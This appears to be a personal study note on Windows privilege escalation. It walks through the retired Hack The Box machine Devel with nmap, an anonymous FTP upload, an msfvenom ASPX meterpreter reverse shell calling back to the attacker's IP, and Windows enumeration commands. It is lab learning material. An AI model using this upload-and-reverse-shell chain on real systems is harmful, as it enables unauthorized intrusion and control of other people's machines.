(30May23Tue)
Windows Privilege Escalation for Beginners | TCM Security, Inc.
Windows Privilege Escalation for Beginners - YouTube
FuzzySecurity | Windows Privilege Escalation Fundamentals
PayloadsAllTheThings/Windows - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThings
Windows Privilege Escalation Guide
Privilege Escalation - Windows · Total OSCP Guide
https://app.hackthebox.com/machines/3
Devel (EASY - RETIRED)
sudo nmap -A -T4 -p- 10.129.234.141
![[Pasted image 20230530170427.png]]
echo "this is a test" > test.txt
![[Pasted image 20230530164800.png]]
ftp 10.129.234.141
anonymous : anonymous
put test.txt
![[Pasted image 20230530170808.png]]
http://10.129.234.141/test.txt
![[Pasted image 20230530170845.png]]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f aspx > exploit.aspx
![[Pasted image 20230530171010.png]]
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
![[Pasted image 20230530171632.png]]
![[Pasted image 20230530171753.png]]
![[Pasted image 20230530171849.png]]
![[Pasted image 20230530171931.png]]
getuid
sysinfo
![[Pasted image 20230530172139.png]]
pwd
shell
systeminfo
![[Pasted image 20230530172652.png]]
![[Pasted image 20230530172758.png]]
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
![[Pasted image 20230530173134.png]]
hostname
wmic qfe
![[Pasted image 20230530173421.png]]
WMIC - Windows Management Instrumentation Command
qfe - quick-fix engineering
Win32_QuickFixEngineering class - Win32 apps | Microsoft Learn
![[Screenshot 2023-05-30 175339.png]]
wmic qfe get Caption,Description,HotFixID,InstalledOn
![[Screenshot 2023-05-30 180311.png]]
wmic logicaldisk
![[Screenshot 2023-05-30 181225.png]]
wmic logicaldisk get caption,description,providername
![[Pasted image 20230530181515.png]]
whomi
whoami /priv
![[Pasted image 20230530181813.png]]
whoami /groups
![[Pasted image 20230530182003.png]]
net user
![[Pasted image 20230530182557.png]]
net user babis
![[Pasted image 20230530182638.png]]
net user Administrator
![[Pasted image 20230530182831.png]]
net localgroup
net localgroup administrators
![[Pasted image 20230530183242.png]]
ipconfig /all
![[Pasted image 20230530183606.png]]
arp -a
![[Pasted image 20230530183757.png]]
route print
![[Pasted image 20230530184008.png]]
netstat -ano
![[Pasted image 20230530184353.png]]